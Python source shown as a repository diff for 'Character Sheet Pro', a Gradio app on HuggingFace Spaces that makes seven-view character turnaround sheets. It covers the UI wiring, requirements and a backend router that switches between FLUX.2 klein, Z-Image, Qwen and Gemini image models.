    yield (None, "Initializing...", *empty_previews, None, None)

    # Preprocess all input images to PNG-compatible RGB format
    input_image = ensure_png_image(input_image)
    face_image = ensure_png_image(face_image)
    body_image = ensure_png_image(body_image)
    costume_image = ensure_png_image(costume_image)

    # Validate input
    if input_type == "Face + Body (Separate)":
        if face_image is None or body_image is None:
            yield (None, "Error: Both face and body images required for this mode.",
                   *empty_previews, None, None)
            return
    elif input_image is None:
        yield (None, "Error: Please upload an input image.", *empty_previews, None, None)
        return

    # Get API key: UI override wins over the Spaces secret.
    # NOTE(review): assumes api_key_override is always a str (Gradio Textbox
    # yields ""), never None — confirm against the UI wiring.
    api_key = api_key_override.strip() if api_key_override.strip() else API_KEY

    # Show loading state
    progress(0.1, desc="Allocating GPU...")
    yield (None, "Allocating GPU and loading model (this may take 30-60 seconds on first run)...",
           *empty_previews, None, None)

    try:
        # Call the GPU-wrapped function
        character_sheet, status, metadata = generate_with_gpu(
            input_image=input_image,
            input_type=input_type,
            character_name=character_name or "Character",
            gender=gender,
            costume_description=costume_description,
            costume_image=costume_image,
            face_image=face_image,
            body_image=body_image,
            backend_choice=backend_choice,
            api_key=api_key,
            num_steps=int(num_steps),
            guidance_scale=float(guidance_scale),
            include_costume_in_faces=include_costume_in_faces
        )

        if character_sheet is None:
            # Generation failed; status carries the error message.
            yield (None, status, *empty_previews, None, None)
            return

        # Get stages from metadata for preview
        stages = metadata.get('stages', {})

        # Create preview list (order must match the UI preview components)
        preview_list = [
            stages.get('left_face'),
            stages.get('front_face'),
            stages.get('right_face'),
            stages.get('left_body'),
            stages.get('front_body'),
            stages.get('right_body'),
            stages.get('back_body')
        ]

        # Determine backend
        backend = BackendRouter.backend_from_string(backend_choice)

        # Create metadata JSON
        config = CharacterSheetConfig()
        json_metadata = create_character_sheet_metadata(
            character_name=character_name or "Character",
            character_sheet=character_sheet,
            stages=stages,
            config=config,
            backend=BackendRouter.BACKEND_NAMES.get(backend, backend_choice),
            input_type=input_type,
            costume_description=costume_description,
            steps=num_steps,
            guidance=guidance_scale
        )

        # Save JSON file
        safe_name = sanitize_filename(character_name or "Character")
        timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
        json_path = OUTPUT_DIR / f"{safe_name}_{timestamp}_metadata.json"
        with open(json_path, 'w') as f:
            json.dump(json_metadata, f, indent=2)

        # Create ZIP file
        zip_path = create_download_zip(
            character_name=character_name or "Character",
            character_sheet=character_sheet,
            stages=stages,
            metadata=json_metadata,
            output_dir=OUTPUT_DIR
        )

        # Final yield with all outputs
        yield (
            character_sheet,
            status,
            *preview_list,
            str(json_path),
            str(zip_path)
        )

    except Exception as e:
        # UI boundary: surface any failure as a status message, never raise.
        logger.exception(f"Error: {e}")
        yield (None, f"Error: {str(e)}", *empty_previews, None, None)
|
| 567 |
+
|
| 568 |
+
|
| 569 |
def update_input_visibility(input_type: str):
    """Update visibility of input components based on input type.

    Returns three gr.update objects for (main input, face input, body
    input). "Face + Body (Separate)" mode hides the single uploader and
    shows the two dedicated ones; every other mode does the opposite.
    """
    separate_mode = input_type == "Face + Body (Separate)"
    return (
        gr.update(visible=not separate_mode),  # Main input
        gr.update(visible=separate_mode),      # Face input
        gr.update(visible=separate_mode),      # Body input
    )
|
| 583 |
+
|
| 584 |
+
|
| 585 |
+
def update_defaults_on_backend_change(backend_value: str):
    """Refresh steps, guidance, and costume-in-faces defaults for a backend.

    Args:
        backend_value: Backend identifier string from the backend dropdown.

    Returns:
        gr.update objects for the steps, guidance, and costume-in-faces widgets.
    """
    default_steps, default_guidance = get_model_defaults(backend_value)
    return (
        gr.update(value=default_steps),
        gr.update(value=default_guidance),
        gr.update(value=get_costume_in_faces_default(backend_value)),
    )
|
| 590 |
+
|
| 591 |
+
|
| 592 |
+
# =============================================================================
|
| 593 |
+
# Gradio UI
|
| 594 |
+
# =============================================================================
|
| 595 |
+
|
| 596 |
+
# CSS for the interface.
# NOTE: this must be supplied via the `css` argument of gr.Blocks(); the class
# names below (.gpu-banner, .generate-btn-main) are attached to components
# through `elem_classes` in create_ui().
APP_CSS = """
.container { max-width: 1200px; margin: auto; }
.output-image { min-height: 400px; }

/* GPU status banner */
.gpu-banner {
    background: linear-gradient(90deg, #7c3aed, #a855f7);
    padding: 12px 20px;
    text-align: center;
    color: white;
    font-weight: bold;
    border-radius: 8px;
    margin-bottom: 16px;
}

/* Generate button styling */
.generate-btn-main {
    background: linear-gradient(90deg, #00aa44, #00cc55) !important;
    color: white !important;
    font-weight: bold !important;
    font-size: 20px !important;
    padding: 16px 32px !important;
    border: none !important;
    box-shadow: 0 4px 15px rgba(0, 170, 68, 0.4) !important;
}

.generate-btn-main:hover {
    background: linear-gradient(90deg, #00cc55, #00ee66) !important;
}
"""
|
| 627 |
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 628 |
|
| 629 |
+
def create_ui():
    """Create the Gradio interface for HuggingFace Spaces.

    Returns:
        gr.Blocks: the fully wired demo (caller invokes .launch() on it).
    """
    # FIX: `theme` and `css` are gr.Blocks() constructor arguments. The old
    # code passed them to Blocks.launch() in __main__, where launch() does not
    # accept them -- apply them here so the styling actually takes effect.
    with gr.Blocks(
        title="Character Sheet Pro",
        theme=gr.themes.Soft(),
        css=APP_CSS,
    ) as demo:

        # GPU status banner
        gr.HTML(
            '<div class="gpu-banner">'
            'Zero GPU (A10G) - Model loads automatically on first generation'
            '</div>'
        )

        gr.Markdown("# Character Sheet Pro")
        gr.Markdown("Generate 7-view character turnaround sheets from a single input image using FLUX.2 klein.")

        # Backend selection and controls
        with gr.Row():
            backend_dropdown = gr.Dropdown(
                choices=[
                    ("FLUX.2 klein 9B (Best Quality, ~20GB)", "flux_klein_9b_fp8"),
                    ("FLUX.2 klein 4B (Fast, ~13GB)", BackendType.FLUX_KLEIN.value),
                    ("Gemini Flash (Cloud - Fallback)", BackendType.GEMINI_FLASH.value),
                ],
                value="flux_klein_9b_fp8",  # Default to best quality
                label="Backend",
                scale=2
            )

            api_key_input = gr.Textbox(
                label="Gemini API Key (for cloud backend)",
                placeholder="Enter API key if using Gemini",
                type="password",
                value="",
                scale=2
            )

        with gr.Row():
            # Left column: Inputs
            with gr.Column(scale=1):
                gr.Markdown("### Input Settings")

                input_type = gr.Radio(
                    choices=["Face Only", "Full Body", "Face + Body (Separate)"],
                    value="Face Only",
                    label="Input Type",
                    info="What type of image(s) are you providing?"
                )

                main_input = gr.Image(
                    label="Input Image",
                    type="pil",
                    format="png",
                    visible=True
                )

                # FIX: the row must stay visible. update_input_visibility only
                # toggles the child images (its outputs are main/face/body
                # inputs, never the row), so with visible=False the face/body
                # references could never appear in "Face + Body" mode.
                with gr.Row() as face_body_row:
                    face_input = gr.Image(
                        label="Face Reference",
                        type="pil",
                        format="png",
                        visible=False
                    )
                    body_input = gr.Image(
                        label="Body Reference",
                        type="pil",
                        format="png",
                        visible=False
                    )

                gr.Markdown("### Character Details")

                character_name = gr.Textbox(
                    label="Character Name",
                    placeholder="My Character",
                    value=""
                )

                gender = gr.Radio(
                    choices=["Auto/Neutral", "Male", "Female"],
                    value="Auto/Neutral",
                    label="Gender"
                )

                costume_description = gr.Textbox(
                    label="Costume Description (Optional)",
                    placeholder="e.g., Full plate armor with gold trim...",
                    value="",
                    lines=3
                )

                costume_image = gr.Image(
                    label="Costume Reference Image (Optional)",
                    type="pil",
                    format="png"
                )

                gr.Markdown("### Generation Parameters")

                with gr.Row():
                    num_steps = gr.Number(
                        label="Inference Steps",
                        value=4,
                        minimum=1,
                        maximum=50,
                        step=1,
                        info="FLUX klein uses 4 steps"
                    )
                    guidance_scale = gr.Number(
                        label="Guidance Scale",
                        value=1.0,
                        minimum=0.0,
                        maximum=10.0,
                        step=0.1,
                        info="FLUX klein uses 1.0"
                    )

                include_costume_in_faces = gr.Checkbox(
                    label="Include costume in face views",
                    value=False,
                    info="Turn OFF for FLUX (can confuse framing)"
                )

                # GENERATE BUTTON
                generate_btn = gr.Button(
                    "GENERATE CHARACTER SHEET",
                    variant="primary",
                    size="lg",
                    elem_classes=["generate-btn-main"]
                )

            # Right column: Output
            with gr.Column(scale=2):
                gr.Markdown("### Generated Character Sheet")

                output_image = gr.Image(
                    label="Character Sheet",
                    type="pil",
                    format="png",
                    elem_classes=["output-image"]
                )

                status_text = gr.Textbox(
                    label="Status",
                    interactive=False
                )

                # Preview gallery
                gr.Markdown("### Individual Views Preview")

                with gr.Row():
                    gr.Markdown("**Face Views:**")
                with gr.Row():
                    preview_left_face = gr.Image(label="Left Face", type="pil", height=150, width=112)
                    preview_front_face = gr.Image(label="Front Face", type="pil", height=150, width=112)
                    preview_right_face = gr.Image(label="Right Face", type="pil", height=150, width=112)

                with gr.Row():
                    gr.Markdown("**Body Views:**")
                with gr.Row():
                    preview_left_body = gr.Image(label="Left Body", type="pil", height=150, width=84)
                    preview_front_body = gr.Image(label="Front Body", type="pil", height=150, width=84)
                    preview_right_body = gr.Image(label="Right Body", type="pil", height=150, width=84)
                    preview_back_body = gr.Image(label="Back Body", type="pil", height=150, width=84)

                # Downloads
                gr.Markdown("### Downloads")
                with gr.Row():
                    json_download = gr.File(label="Metadata JSON", interactive=False)
                    zip_download = gr.File(label="Complete Package (ZIP)", interactive=False)

        # Usage instructions
        gr.Markdown("---")
        gr.Markdown("### How to Use")
        gr.Markdown("""
        1. **Upload an image** (face portrait or full body)
        2. **Select input type** based on your image
        3. **Optionally** add character name, gender, and costume description
        4. **Click Generate** - the model loads automatically on first run (~30-60s)
        5. **Wait** for all 7 views to generate (~2-3 minutes total)
        6. **Download** the complete package

        **GPU Notes:**
        - Uses Zero GPU (A10G 24GB) - free but with 5-minute session limit
        - First generation loads the model (adds ~30-60 seconds)
        - Subsequent generations in the same session are faster
        - If GPU unavailable, switch to Gemini Flash (requires API key)
        """)

        # Event handlers
        input_type.change(
            fn=update_input_visibility,
            inputs=[input_type],
            outputs=[main_input, face_input, body_input]
        )

        backend_dropdown.change(
            fn=update_defaults_on_backend_change,
            inputs=[backend_dropdown],
            outputs=[num_steps, guidance_scale, include_costume_in_faces]
        )

        generate_btn.click(
            fn=generate_character_sheet,
            inputs=[
                main_input,
                input_type,
                character_name,
                gender,
                costume_description,
                costume_image,
                face_input,
                body_input,
                backend_dropdown,
                api_key_input,
                num_steps,
                guidance_scale,
                include_costume_in_faces
            ],
            outputs=[
                output_image,
                status_text,
                preview_left_face,
                preview_front_face,
                preview_right_face,
                preview_left_body,
                preview_front_body,
                preview_right_body,
                preview_back_body,
                json_download,
                zip_download
            ]
        )

    return demo
|
| 863 |
+
|
| 864 |
+
|
| 865 |
+
# =============================================================================
|
| 866 |
+
# Main
|
| 867 |
+
# =============================================================================
|
| 868 |
+
|
| 869 |
+
if __name__ == "__main__":
    demo = create_ui()

    # FIX: Blocks.launch() does not accept `theme`/`css` keyword arguments --
    # they belong on the gr.Blocks() constructor (see create_ui). Passing them
    # here raised TypeError at startup on both branches.
    if HF_SPACES:
        # Running on HuggingFace Spaces -- Spaces manages host/port/share.
        demo.launch()
    else:
        # Local testing
        print("Running locally (no Zero GPU)")
        demo.launch(
            server_name="0.0.0.0",
            server_port=7890,
            share=False
        )
|
requirements.txt
CHANGED
|
@@ -1,8 +1,36 @@
|
|
| 1 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 2 |
git+https://github.com/huggingface/diffusers.git
|
| 3 |
-
|
| 4 |
-
|
| 5 |
-
|
| 6 |
-
|
| 7 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 8 |
invisible_watermark
|
|
|
|
| 1 |
+
# Character Sheet Pro - HuggingFace Spaces
|
| 2 |
+
# =========================================
|
| 3 |
+
|
| 4 |
+
# Image processing
|
| 5 |
+
Pillow>=10.0.0
|
| 6 |
+
|
| 7 |
+
# Utilities
|
| 8 |
+
python-dotenv>=1.0.0
|
| 9 |
+
|
| 10 |
+
# Diffusers from git (required for Flux2KleinPipeline)
|
| 11 |
git+https://github.com/huggingface/diffusers.git
|
| 12 |
+
|
| 13 |
+
# PyTorch
|
| 14 |
+
torch>=2.1.0
|
| 15 |
+
torchvision>=0.16.0
|
| 16 |
+
|
| 17 |
+
# Transformers
|
| 18 |
+
transformers>=4.40.0
|
| 19 |
+
|
| 20 |
+
# Accelerate
|
| 21 |
+
accelerate>=0.25.0
|
| 22 |
+
|
| 23 |
+
# HuggingFace Hub
|
| 24 |
+
huggingface-hub>=0.20.0
|
| 25 |
+
|
| 26 |
+
# Safetensors
|
| 27 |
+
safetensors>=0.4.0
|
| 28 |
+
|
| 29 |
+
# Sentencepiece
|
| 30 |
+
sentencepiece>=0.1.99
|
| 31 |
+
|
| 32 |
+
# Google Gemini API (fallback backend)
|
| 33 |
+
google-genai>=0.3.0
|
| 34 |
+
|
| 35 |
+
# Invisible watermark (for FLUX)
|
| 36 |
invisible_watermark
|
src/__init__.py
ADDED
|
@@ -0,0 +1,37 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Character Sheet Pro - 7-View Character Sheet Generator
|
| 3 |
+
======================================================
|
| 4 |
+
|
| 5 |
+
A standalone character sheet generation system that creates
|
| 6 |
+
multi-view turnaround sheets from a single input image.
|
| 7 |
+
|
| 8 |
+
Supports:
|
| 9 |
+
- 7 views (3 face + 4 body)
|
| 10 |
+
- Multiple backends: Gemini (Cloud), FLUX.2 klein (Local), Qwen-Image-Edit (Local/ComfyUI)
|
| 11 |
+
- HuggingFace Spaces deployment via Gradio
|
| 12 |
+
"""
|
| 13 |
+
|
| 14 |
+
from .models import GenerationRequest, GenerationResult
|
| 15 |
+
from .gemini_client import GeminiClient
|
| 16 |
+
from .character_service import CharacterSheetService
|
| 17 |
+
from .backend_router import BackendRouter, BackendType
|
| 18 |
+
from .flux_klein_client import FluxKleinClient
|
| 19 |
+
from .qwen_image_edit_client import QwenImageEditClient
|
| 20 |
+
from .comfyui_client import ComfyUIClient
|
| 21 |
+
from .model_manager import ModelManager, ModelState, get_model_manager
|
| 22 |
+
|
| 23 |
+
__version__ = "2.3.0" # Bumped for model manager feature
|
| 24 |
+
__all__ = [
|
| 25 |
+
"GenerationRequest",
|
| 26 |
+
"GenerationResult",
|
| 27 |
+
"GeminiClient",
|
| 28 |
+
"CharacterSheetService",
|
| 29 |
+
"BackendRouter",
|
| 30 |
+
"BackendType",
|
| 31 |
+
"FluxKleinClient",
|
| 32 |
+
"QwenImageEditClient",
|
| 33 |
+
"ComfyUIClient",
|
| 34 |
+
"ModelManager",
|
| 35 |
+
"ModelState",
|
| 36 |
+
"get_model_manager",
|
| 37 |
+
]
|
src/backend_router.py
ADDED
|
@@ -0,0 +1,401 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
Backend Router
|
| 3 |
+
==============
|
| 4 |
+
|
| 5 |
+
Unified router for selecting between different image generation backends:
|
| 6 |
+
- Gemini (Flash/Pro) - Cloud API
|
| 7 |
+
- FLUX.2 klein 4B/9B - Local model
|
| 8 |
+
- Z-Image Turbo (Tongyi-MAI) - Local model, 6B, 9 steps, 16GB VRAM
|
| 9 |
+
- Qwen-Image-Edit-2511 - Local model
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import logging
|
| 13 |
+
from typing import Optional, Protocol, Union
|
| 14 |
+
from enum import Enum, auto
|
| 15 |
+
from PIL import Image
|
| 16 |
+
|
| 17 |
+
from .models import GenerationRequest, GenerationResult
|
| 18 |
+
|
| 19 |
+
|
| 20 |
+
logger = logging.getLogger(__name__)
|
| 21 |
+
|
| 22 |
+
|
| 23 |
+
class BackendType(Enum):
    """Available backend types.

    The enum *value* strings are the identifiers the UI layer passes around
    (see ``BackendRouter.backend_from_string``), so they must remain stable.
    """
    GEMINI_FLASH = "gemini_flash"
    GEMINI_PRO = "gemini_pro"
    FLUX_KLEIN = "flux_klein"  # 4B model (~13GB VRAM)
    FLUX_KLEIN_9B_FP8 = "flux_klein_9b_fp8"  # 9B FP8 model (~20GB VRAM, best quality)
    ZIMAGE_TURBO = "zimage_turbo"  # Z-Image Turbo 6B (9 steps, 16GB VRAM)
    ZIMAGE_BASE = "zimage_base"  # Z-Image Base 6B (50 steps, CFG support) - NEW!
    LONGCAT_EDIT = "longcat_edit"  # LongCat-Image-Edit (instruction-following, 18GB)
    QWEN_IMAGE_EDIT = "qwen_image_edit"  # Direct diffusers (slow, high VRAM)
    QWEN_COMFYUI = "qwen_comfyui"  # Via ComfyUI with FP8 quantization
|
| 34 |
+
|
| 35 |
+
|
| 36 |
+
class ImageClient(Protocol):
    """Structural (duck-typed) interface for image generation clients.

    Concrete implementations (GeminiClient, FluxKleinClient, ZImageClient,
    etc.) are matched by shape, not inheritance -- see ``typing.Protocol``.
    """

    def generate(self, request: GenerationRequest, **kwargs) -> GenerationResult:
        """Generate an image from request."""
        ...

    def is_healthy(self) -> bool:
        """Check if client is ready."""
        ...
|
| 46 |
+
|
| 47 |
+
|
| 48 |
+
class BackendRouter:
    """
    Router for selecting between image generation backends.

    Clients are created lazily and cached per backend, so heavyweight local
    models are only loaded when first requested and can be explicitly
    unloaded to free memory.
    """

    # Human-readable display names, keyed by backend type.
    BACKEND_NAMES = {
        BackendType.GEMINI_FLASH: "Gemini Flash",
        BackendType.GEMINI_PRO: "Gemini Pro",
        BackendType.FLUX_KLEIN: "FLUX.2 klein 4B",
        BackendType.FLUX_KLEIN_9B_FP8: "FLUX.2 klein 9B-FP8",
        BackendType.ZIMAGE_TURBO: "Z-Image Turbo 6B",
        BackendType.ZIMAGE_BASE: "Z-Image Base 6B",
        BackendType.LONGCAT_EDIT: "LongCat-Image-Edit",
        BackendType.QWEN_IMAGE_EDIT: "Qwen-Image-Edit-2511",
        BackendType.QWEN_COMFYUI: "Qwen-Image-Edit-2511-FP8 (ComfyUI)",
    }

    # Backends that hold model weights locally (or via a local ComfyUI server)
    # and therefore need explicit unloading to reclaim memory.
    # FIX: this set was previously duplicated verbatim inside
    # unload_local_models(), switch_backend() and is_local_backend();
    # keep it in exactly one place.
    LOCAL_BACKENDS = frozenset({
        BackendType.FLUX_KLEIN,
        BackendType.FLUX_KLEIN_9B_FP8,
        BackendType.ZIMAGE_TURBO,
        BackendType.ZIMAGE_BASE,
        BackendType.LONGCAT_EDIT,
        BackendType.QWEN_IMAGE_EDIT,
        BackendType.QWEN_COMFYUI,
    })

    def __init__(
        self,
        gemini_api_key: Optional[str] = None,
        default_backend: BackendType = BackendType.GEMINI_FLASH
    ):
        """
        Initialize backend router.

        Args:
            gemini_api_key: API key for Gemini backends
            default_backend: Default backend to use
        """
        self.gemini_api_key = gemini_api_key
        self.default_backend = default_backend
        self._clients: dict = {}          # cache: BackendType -> client instance
        self._active_backend: Optional[BackendType] = None

        logger.info(f"BackendRouter initialized (default: {default_backend.value})")

    def get_client(self, backend: Optional[BackendType] = None) -> ImageClient:
        """
        Get or create client for specified backend.

        Args:
            backend: Backend type (uses default if None)

        Returns:
            ImageClient instance
        """
        if backend is None:
            backend = self.default_backend

        # Return cached client if available
        if backend in self._clients:
            self._active_backend = backend
            return self._clients[backend]

        # Create new client
        client = self._create_client(backend)
        self._clients[backend] = client
        self._active_backend = backend

        return client

    def _create_client(self, backend: BackendType) -> ImageClient:
        """Create client for specified backend.

        Raises:
            ValueError: missing API key or unknown backend.
            RuntimeError: a local model failed to load / ComfyUI not running.
        """
        logger.info(f"Creating client for {backend.value}...")

        if backend == BackendType.GEMINI_FLASH:
            from .gemini_client import GeminiClient
            if not self.gemini_api_key:
                raise ValueError("Gemini API key required for Gemini backends")
            return GeminiClient(api_key=self.gemini_api_key, use_pro_model=False)

        elif backend == BackendType.GEMINI_PRO:
            from .gemini_client import GeminiClient
            if not self.gemini_api_key:
                raise ValueError("Gemini API key required for Gemini backends")
            return GeminiClient(api_key=self.gemini_api_key, use_pro_model=True)

        elif backend == BackendType.FLUX_KLEIN:
            from .flux_klein_client import FluxKleinClient
            # 4B model (~13GB VRAM) - fast
            client = FluxKleinClient(
                model_variant="4b",
                enable_cpu_offload=False
            )
            if not client.load_model():
                raise RuntimeError("Failed to load FLUX.2 klein 4B model")
            return client

        elif backend == BackendType.FLUX_KLEIN_9B_FP8:
            from .flux_klein_client import FluxKleinClient
            # 9B model (~29GB VRAM with CPU offload) - best quality
            client = FluxKleinClient(
                model_variant="9b",
                enable_cpu_offload=True  # Required for 24GB VRAM
            )
            if not client.load_model():
                raise RuntimeError("Failed to load FLUX.2 klein 9B model")
            return client

        elif backend == BackendType.ZIMAGE_TURBO:
            from .zimage_client import ZImageClient
            # Z-Image Turbo 6B - fast (9 steps), fits 16GB VRAM
            client = ZImageClient(
                model_variant="turbo",
                enable_cpu_offload=True
            )
            if not client.load_model():
                raise RuntimeError("Failed to load Z-Image Turbo model")
            return client

        elif backend == BackendType.ZIMAGE_BASE:
            from .zimage_client import ZImageClient
            # Z-Image Base 6B - quality (50 steps), CFG support, negative prompts
            client = ZImageClient(
                model_variant="base",
                enable_cpu_offload=True
            )
            if not client.load_model():
                raise RuntimeError("Failed to load Z-Image Base model")
            return client

        elif backend == BackendType.LONGCAT_EDIT:
            from .longcat_edit_client import LongCatEditClient
            # LongCat-Image-Edit - instruction-following editing (~18GB VRAM)
            client = LongCatEditClient(
                enable_cpu_offload=True
            )
            if not client.load_model():
                raise RuntimeError("Failed to load LongCat-Image-Edit model")
            return client

        elif backend == BackendType.QWEN_IMAGE_EDIT:
            from .qwen_image_edit_client import QwenImageEditClient
            client = QwenImageEditClient(enable_cpu_offload=False)
            if not client.load_model():
                raise RuntimeError("Failed to load Qwen-Image-Edit model")
            return client

        elif backend == BackendType.QWEN_COMFYUI:
            from .comfyui_client import ComfyUIClient
            client = ComfyUIClient()
            if not client.is_healthy():
                raise RuntimeError(
                    "ComfyUI is not running. Please start ComfyUI first:\n"
                    "  cd comfyui && python main.py"
                )
            return client

        else:
            raise ValueError(f"Unknown backend: {backend}")

    def generate(
        self,
        request: GenerationRequest,
        backend: Optional[BackendType] = None,
        **kwargs
    ) -> GenerationResult:
        """
        Generate image using specified backend.

        Args:
            request: Generation request
            backend: Backend to use (default if None)
            **kwargs: Backend-specific parameters

        Returns:
            GenerationResult (an error result on failure; never raises)
        """
        try:
            client = self.get_client(backend)
            return client.generate(request, **kwargs)
        except Exception as e:
            logger.error(f"Generation failed with {backend}: {e}", exc_info=True)
            return GenerationResult.error_result(f"Backend error: {str(e)}")

    def unload_local_models(self):
        """Unload all local models to free memory."""
        for backend, client in list(self._clients.items()):
            if backend in self.LOCAL_BACKENDS:
                if hasattr(client, 'unload_model'):
                    client.unload_model()
                del self._clients[backend]
                logger.info(f"Unloaded {backend.value}")

    def switch_backend(self, backend: BackendType) -> bool:
        """
        Switch to a different backend.

        For local models, this will load the new model and unload all other
        local models first to save memory.

        Args:
            backend: Backend to switch to

        Returns:
            True if switch successful
        """
        try:
            # Unload other local models first to save memory
            if backend in self.LOCAL_BACKENDS:
                for other_local in self.LOCAL_BACKENDS - {backend}:
                    if other_local in self._clients:
                        if hasattr(self._clients[other_local], 'unload_model'):
                            self._clients[other_local].unload_model()
                        del self._clients[other_local]

            # Get/create the new client
            self.get_client(backend)
            self.default_backend = backend

            logger.info(f"Switched to {backend.value}")
            return True

        except Exception as e:
            logger.error(f"Failed to switch to {backend}: {e}", exc_info=True)
            return False

    def get_active_backend_name(self) -> str:
        """Get human-readable name of active backend."""
        if self._active_backend:
            return self.BACKEND_NAMES.get(self._active_backend, str(self._active_backend))
        return "None"

    def is_local_backend(self, backend: Optional[BackendType] = None) -> bool:
        """Check if backend (active backend if None) is a local model."""
        if backend is None:
            backend = self._active_backend
        return backend in self.LOCAL_BACKENDS

    @staticmethod
    def get_supported_aspect_ratios(backend: BackendType) -> dict:
        """
        Get supported aspect ratios for a backend.

        Returns dict mapping ratio strings to (width, height) tuples.
        """
        # Import clients lazily to read their ASPECT_RATIOS class attributes
        if backend in (BackendType.FLUX_KLEIN, BackendType.FLUX_KLEIN_9B_FP8):
            from .flux_klein_client import FluxKleinClient
            return FluxKleinClient.ASPECT_RATIOS

        elif backend in (BackendType.ZIMAGE_TURBO, BackendType.ZIMAGE_BASE):
            from .zimage_client import ZImageClient
            return ZImageClient.ASPECT_RATIOS

        elif backend == BackendType.LONGCAT_EDIT:
            from .longcat_edit_client import LongCatEditClient
